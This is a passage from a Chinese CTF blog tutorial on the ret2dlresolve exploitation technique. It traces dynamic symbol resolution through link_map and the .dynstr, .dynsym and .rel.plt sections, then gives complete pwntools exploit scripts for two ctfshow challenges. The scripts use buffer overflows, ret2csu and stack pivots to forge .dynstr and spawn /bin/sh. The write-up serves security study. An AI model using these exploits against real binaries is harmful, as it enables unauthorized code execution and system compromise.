<p>分别存放了dynstr节、dynsym节、.rel.plt节的基址</p>
<p>那么我们各个节在内存中的具体结构如图</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">===============================================</span><br><span class="line">|      Related sections       |   Structure   |</span><br><span class="line">===============================================</span><br><span class="line">|          .dynamic           | Elf_Dyn entry |</span><br><span class="line">+-----------------+-----------+---------------+</span><br><span class="line">|    Functions    | Variables |      ---      |</span><br><span class="line">+-----------------+-----------+---------------+</span><br><span class="line">|    .ret.plt     | .ret.dyn  | Elf_Rel entry |</span><br><span class="line">+-----------------+-----------+---------------+</span><br><span class="line">|    .dynsym      | .dynsym   | Elf_Sym entry |</span><br><span class="line">+-----------------+-----------+---------------+</span><br><span class="line">|    .dynstr      | .dynstr   | Strings       |</span><br><span class="line">+-----------------+-----------+---------------+</span><br></pre></td></tr></table></figure>

<h3 id="大概解析流程"><a href="#大概解析流程" class="headerlink" title="大概解析流程"></a>大概解析流程</h3><p>下面直接放张图方便理解</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/202406051458206-1745939812039-7.png" alt="img"></p>
<h3 id="动态调式查看具体解析流程"><a href="#动态调式查看具体解析流程" class="headerlink" title="动态调式查看具体解析流程"></a>动态调式查看具体解析流程</h3><p>直接这样说肯定不足以深入理解的，所以接下来会通过动态调式来查看具体解析流程</p>
<h4 id="确定link-map中l-info的地址"><a href="#确定link-map中l-info的地址" class="headerlink" title="确定link_map中l_info的地址"></a>确定link_map中l_info的地址</h4><p>不同的glibc版本l_info可能不同，网上并没有找到一个准确的偏移</p>
<p>但是通过观察link_map结构体不难发现l_info之前的成员有8个</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">l_addr</span><br><span class="line">l_name</span><br><span class="line">l_ld</span><br><span class="line">l_next</span><br><span class="line">l_prev</span><br><span class="line">l_real</span><br><span class="line">l_ns</span><br><span class="line">l_libname</span><br></pre></td></tr></table></figure>

<p>那么通常情况下偏移应该就是0x20(调式环境为32位，如果是64位偏移通常应该是0x40)</p>
<p>知道了l_info的地址，就可以通过相关的d_tag的地址找到我们需要的段的基地址了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#define DT_STRTAB              5                /* Address of string table */</span><br><span class="line">#define DT_SYMTAB              6                /* Address of symbol table */</span><br><span class="line">#define DT_JMPREL             23                /* Address of PLT relocs */</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_23-43-35-1745939812039-9.png" alt="Snipaste_2025-03-04_23-43-35"></p>
<h4 id="确定动态链接所需的几个节的地址"><a href="#确定动态链接所需的几个节的地址" class="headerlink" title="确定动态链接所需的几个节的地址"></a>确定动态链接所需的几个节的地址</h4><p>然后我们通过d_tag找到对应段的基地址</p>
<p>这里给出一个公式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">DT_xxx_addr = ptr [l_info_addr + lenth * (offset - 1)]</span><br><span class="line">lenth为字长</span><br><span class="line">offset位DT_xxx对应于l_info的条目</span><br></pre></td></tr></table></figure>

<h5 id="dynstr-addr"><a href="#dynstr-addr" class="headerlink" title="dynstr_addr"></a>dynstr_addr</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DT_STRTAB_addr = ptr [0xf7ffda44 + 0x4 * (5 - 1)] = 0x8049804</span><br></pre></td></tr></table></figure>

<p>我们可以发现动态调试和我们在IDA里看到的却是是一样的</p>
<p>dynstr的地址是0x0804824C</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DT_STRTAB_addr = ptr [l_info_addr + 0x4 * (5-1)]</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-05_00-07-40-1745939812039-13.png" alt="Snipaste_2025-03-05_00-07-40"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305002003747-1745939812039-11.png" alt="image-20250305002003747"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305002029521-1745939812039-15.png" alt="image-20250305002029521"></p>
<h5 id="dynsym-addr"><a href="#dynsym-addr" class="headerlink" title="dynsym_addr"></a>dynsym_addr</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DT_SYMTAB_addr = ptr [0xf7ffda44 + 0x4 * (6 - 1)] = 0x804980c</span><br></pre></td></tr></table></figure>

<p>dynsym的地址是0x080481AC</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003048577-1745939812039-17.png" alt="image-20250305003048577"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003232146-1745939812039-19.png" alt="image-20250305003232146"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003304085-1745939812039-21.png" alt="image-20250305003304085"></p>
<h5 id="rel-plt-addr"><a href="#rel-plt-addr" class="headerlink" title=".rel.plt_addr"></a>.rel.plt_addr</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DT_JMPREL_addr = ptr [0xf7ffda44 + 0x4 * (23 - 1)] = 0x8049844</span><br></pre></td></tr></table></figure>

<p>.rel.plt的地址是0x8048304</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305004030135.png" alt="image-20250305004030135"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003736753.png" alt="image-20250305003736753"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003844655.png" alt="image-20250305003844655"></p>
<h4 id="通过read函数来观察是怎么找到符号名称的"><a href="#通过read函数来观察是怎么找到符号名称的" class="headerlink" title="通过read函数来观察是怎么找到符号名称的"></a>通过read函数来观察是怎么找到符号名称的</h4><p>read函数的reloc_index是8</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">r_info = ptr [.rel.plt_addr + reloc_index + lenth] = 0x207</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305004650994.png" alt="image-20250305004650994"><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305005337679.png" alt="image-20250305005337679"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">st_name = ptr [dynsym_addr + (r_info&gt;&gt;8) * 0x10] = 0x27</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305011200923.png" alt="image-20250305011200923"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">read_str = ptr [.dynstr_addr + st_name] = /* &#x27;read&#x27; */</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305011401972.png" alt="image-20250305011401972"></p>
<h2 id="ret2dlresolve之No-Relro"><a href="#ret2dlresolve之No-Relro" class="headerlink" title="ret2dlresolve之No-Relro"></a>ret2dlresolve之No-Relro</h2><h3 id="32位下No-Relro"><a href="#32位下No-Relro" class="headerlink" title="32位下No-Relro"></a>32位下No-Relro</h3><p>以ctfshow中的pwn82为例</p>
<p>进入到ctfshow函数中，发现有溢出点</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305185526111.png" alt="image-20250305185526111"></p>
<p>因为是No-Relro所以.dynamic可写，那么我们直接将.dynamic中的DT_STRTAB的值给改成我们恶意伪造在bss段上的.dynstr节(将任意函数名替换成system)的地址就可以直接进行攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = remote(&#x27;pwn.challenge.ctf.show&#x27;,28268)</span><br><span class="line">#sh = process(&#x27;./pwn1&#x27;)</span><br><span class="line">elf = ELF(&#x27;./pwn1&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#gdb.attach(sh, &#x27;b *0x8048513\nc&#x27;)</span><br><span class="line">pop_3 = 0x08048629</span><br><span class="line">read_plt_next = 0x08048376</span><br><span class="line">bss_addr = 0x080498E0</span><br><span class="line"></span><br><span class="line">DT_STRTAB_addr = 0x08049808</span><br><span class="line">dynstr = elf.get_section_by_name(&#x27;.dynstr&#x27;).data()</span><br><span class="line">fake_dynstr = dynstr.replace(b&#x27;read&#x27;,b&#x27;system&#x27;)</span><br><span class="line"></span><br><span class="line">payload = cyclic(0x6C + 0x4) + p32(elf.sym[&#x27;read&#x27;]) + p32(pop_3) + p32(0) + p32(DT_STRTAB_addr) + p32(4)</span><br><span class="line">payload += p32(elf.sym[&#x27;read&#x27;]) + p32(pop_3) + p32(0) + p32(bss_addr + 0x100) + p32(len(b&#x27;/bin/sh\x00&#x27;))</span><br><span class="line">payload += p32(elf.sym[&#x27;read&#x27;]) + p32(pop_3) + p32(0) + p32(bss_addr) + p32(len(fake_dynstr))</span><br><span class="line">payload += p32(read_plt_next) + p32(0xdeadbeef) + p32(bss_addr + 0x100)</span><br><span class="line">sh.sendlineafter(&#x27;Welcome to CTFshowPWN!\n&#x27;,payload)</span><br><span class="line">sh.send(p32(bss_addr))</span><br><span class="line">sh.send(b&#x27;/bin/sh\x00&#x27;)</span><br><span class="line">sh.send(fake_dynstr)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="64位下No-Relro"><a href="#64位下No-Relro" class="headerlink" title="64位下No-Relro"></a>64位下No-Relro</h3><p>以ctfshow Pwn84为例，由于是64位所以需要寄存器传参，但是由于没有合适的gadget，这里采用ret2csu</p>
<p>而且只能溢出0x30个字节，显然不够用，所以还要先进行一次Stack Pivot</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250306103950624.png" alt="image-20250306103950624"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">elf = ELF(&#x27;./pwn2&#x27;)</span><br><span class="line">sh = process(&#x27;./pwn2&#x27;)</span><br><span class="line">#gdb.attach(sh, &#x27;b *0x40063B\nc&#x27;)</span><br><span class="line">#sh = remote(&#x27;pwn.challenge.ctf.show&#x27;, 28161)</span><br><span class="line">DT_STRTAB_addr = 0x600990</span><br><span class="line">read_plt_next = 0x400516</span><br><span class="line">pop_rdi = 0x400773</span><br><span class="line">payload = cyclic(0x70 + 0x8)</span><br><span class="line">csu_front_addr = 0x400750</span><br><span class="line">csu_end_addr = 0x40076A</span><br><span class="line">dynstr = elf.get_section_by_name(&#x27;.dynstr&#x27;).data()</span><br><span class="line">fake_dynstr = dynstr.replace(b&#x27;read&#x27;,b&#x27;system&#x27;)</span><br><span class="line">pivot_addr = elf.bss(0x100) - 0x8</span><br><span class="line">pop_rbp_ret = 0x400588</span><br><span class="line">leave_ret = 0x40063c</span><br><span class="line">ret_addr = 0x4004c6</span><br><span class="line">def ret2csu(fuction, rdi, rsi, rdx):</span><br><span class="line">    payload = p64(csu_end_addr)</span><br><span class="line">    payload += p64(0)</span><br><span class="line">    payload += p64(1)</span><br><span class="line">    payload += p64(fuction)</span><br><span class="line">    payload += p64(rdi)</span><br><span class="line">    payload += p64(rsi)</span><br><span class="line">    payload += p64(rdx)</span><br><span class="line">    payload += p64(csu_front_addr)</span><br><span class="line">    return payload</span><br><span class="line">def ret2csu_end():</span><br><span class="line">    return cyclic(0x38)</span><br><span class="line"></span><br><span class="line">payload = cyclic(0x70 + 0x8)</span><br><span class="line">payload += ret2csu(elf.got[&#x27;read&#x27;],0,elf.bss(0x100),0x150)</span><br><span class="line">payload += ret2csu_end()</span><br><span class="line">payload += p64(ret_addr) + p64(0x40063E)</span><br><span class="line">sh.sendafter(&#x27;Welcome to CTFshowPWN!\n&#x27;,payload)</span><br><span class="line"></span><br><span class="line">payload = ret2csu(elf.got[&#x27;read&#x27;],0,elf.bss(0x300),len(fake_dynstr))</span><br><span class="line">payload += ret2csu(elf.got[&#x27;read&#x27;],0,DT_STRTAB_addr,0x8)</span><br><span class="line">payload += ret2csu(elf.got[&#x27;read&#x27;],0,elf.bss(0x250),len(b&#x27;/bin/sh\x00&#x27;))</span><br><span class="line">payload += ret2csu_end()</span><br><span class="line">payload += p64(ret_addr) + p64(pop_rdi) + p64(elf.bss(0x250)) + p64(read_plt_next) + p64(0xdeadbeef)</span><br><span class="line">sh.send(payload)</span><br><span class="line"></span><br><span class="line">payload = cyclic(0x70) + p64(pivot_addr) + p64(leave_ret)</span><br><span class="line">sh.sendafter(&#x27;Welcome to CTFshowPWN!\n&#x27;,payload)</span><br><span class="line"></span><br><span class="line">sh.send(fake_dynstr)</span><br><span class="line">sh.send(p64(elf.bss(0x300)))</span><br><span class="line">sh.send(b&#x27;/bin/sh\x00&#x27;)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0m3</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/archives/">art1cl3s</a></li>
        
          <li><a href="/search/">s3arch</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2dlresovle%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">ret2dlresovle攻击原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Lazy-Binding"><span class="toc-number">1.1.</span> <span class="toc-text">Lazy Binding</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Related-Dynamic-Sections"><span class="toc-number">1.2.</span> <span class="toc-text">Related Dynamic Sections</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Elf-Rel%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.1.</span> <span class="toc-text">Elf_Rel结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Elf-Sym%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.2.</span> <span class="toc-text">Elf_Sym结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#dynstr%E8%8A%82"><span class="toc-number">1.2.3.</span> <span class="toc-text">dynstr节</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#link-map%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.4.</span> <span class="toc-text">link_map结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Elfxx-Dyn%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.5.</span> <span class="toc-text">Elfxx_Dyn结构体</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E6%A6%82%E8%A7%A3%E6%9E%90%E6%B5%81%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">大概解析流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E8%B0%83%E5%BC%8F%E6%9F%A5%E7%9C%8B%E5%85%B7%E4%BD%93%E8%A7%A3%E6%9E%90%E6%B5%81%E7%A8%8B"><span class="toc-number">1.4.</span> <span class="toc-text">动态调式查看具体解析流程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9Alink-map%E4%B8%ADl-info%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.1.</span> <span class="toc-text">确定link_map中l_info的地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9A%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E6%89%80%E9%9C%80%E7%9A%84%E5%87%A0%E4%B8%AA%E8%8A%82%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.2.</span> <span class="toc-text">确定动态链接所需的几个节的地址</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#dynstr-addr"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">dynstr_addr</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#dynsym-addr"><span class="toc-number">1.4.2.2.</span> <span class="toc-text">dynsym_addr</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#rel-plt-addr"><span class="toc-number">1.4.2.3.</span> <span class="toc-text">.rel.plt_addr</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87read%E5%87%BD%E6%95%B0%E6%9D%A5%E8%A7%82%E5%AF%9F%E6%98%AF%E6%80%8E%E4%B9%88%E6%89%BE%E5%88%B0%E7%AC%A6%E5%8F%B7%E5%90%8D%E7%A7%B0%E7%9A%84"><span class="toc-number">1.4.3.</span> <span class="toc-text">通过read函数来观察是怎么找到符号名称的</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2dlresolve%E4%B9%8BNo-Relro"><span class="toc-number">2.</span> <span class="toc-text">ret2dlresolve之No-Relro</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#32%E4%BD%8D%E4%B8%8BNo-Relro"><span class="toc-number">2.1.</span> <span class="toc-text">32位下No-Relro</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#64%E4%BD%8D%E4%B8%8BNo-Relro"><span class="toc-number">2.2.</span> <span class="toc-text">64位下No-Relro</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&text=ret2dlresolve超详解"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&is_video=false&description=ret2dlresolve超详解"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ret2dlresolve超详解&body=Check out this article: http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&name=ret2dlresolve超详解&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&t=ret2dlresolve超详解"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2016-2025
        PuH4ck3rX
      </div>
      <div class="footer-right">
        <nav>
          <ul>
            <!--
          --><li><a href="/">h0m3</a></li><!--
        --><!--
          --><li><a href="/about/">ab0ut</a></li><!--
        --><!--
          --><li><a href="/archives/">art1cl3s</a></li><!--
        --><!--
          --><li><a href="/search/">s3arch</a></li><!--
        -->
          </ul>
          <ul>
            
              <!-- busuanzi统计 -->
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
      
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'SITENAME';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
